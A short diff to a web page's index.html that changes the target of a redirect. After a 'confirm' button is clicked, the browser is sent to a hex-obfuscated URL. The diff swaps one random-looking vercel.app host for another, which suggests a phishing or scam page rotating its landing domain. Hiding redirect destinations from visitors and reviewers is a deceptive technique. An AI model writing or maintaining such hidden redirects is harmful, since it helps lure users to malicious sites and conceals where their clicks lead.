--- a/index.html
+++ b/index.html
@@ -137,7 +137,7 @@ c.addEventListener("click",()=>{
       m.classList.add("confirmed");
       c.disabled=true;
       setTimeout(()=>{
-        window.location.href= "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x72\x65\x70\x75\x72\x63\x68\x61\x73\x65\x6f\x72\x64\x65\x2e\x76\x65\x72\x63\x65\x6c\x2e\x61\x70\x70\x2f";
+        window.location.href= "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x79\x75\x6e\x6f\x6c\x70\x6f\x6d\x75\x79\x2e\x76\x65\x72\x63\x65\x6c\x2e\x61\x70\x70\x2f";
       },2000);
     }
   }
